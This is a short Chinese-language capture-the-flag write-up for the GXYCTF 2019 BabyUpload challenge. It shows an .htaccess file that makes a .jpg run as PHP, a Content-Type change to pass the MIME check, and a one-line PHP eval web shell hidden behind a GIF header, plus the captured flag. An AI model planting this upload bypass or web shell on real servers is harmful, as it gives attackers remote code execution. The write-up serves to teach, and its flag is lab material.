# [GXYCTF 2019]BabyUpload


# [GXYCTF 2019]BabyUpload

上传`.htaccess`，内容：

```
<FilesMatch  "Lyrio.jpg">
	SetHandler  application/x-httpd-php
</FilesMatch>
```

并且利用 MIME 绕过：更改 `Content-Type`

![[GXYCTF 2019]BabyUpload-1](https://pic.imgdb.cn/item/655e1a03c458853aef9a953d.jpg)

上传`Lyrio.jpg`，内容：

```javascript
GIF89A
<script language='php'>@eval($_POST["Lyrio"]);phpinfo();</script>
```

> `GIF89A`是 gif 文件的文件头
>
> 后端检测`<?php ?>`，用 js 来运行 php 代码

得到文件路径：`/var/www/html/upload/4b41a8e2670fe76c44b959f173787bfa/Lyrio.jpg`

访问一下 Lyrio.jpg 可以看到 php 代码被执行了：

![[GXYCTF 2019]BabyUpload-2](https://pic.imgdb.cn/item/655e1ba1c458853aefa3a1bd.jpg)

用 WebShell 管理器连接，找到 flag：

![[GXYCTF 2019]BabyUpload-3](https://pic.imgdb.cn/item/655e1ca4c458853aefa936e9.jpg)

NSSCTF{315935b2-89cd-4776-b4b7-a45a1c00c016}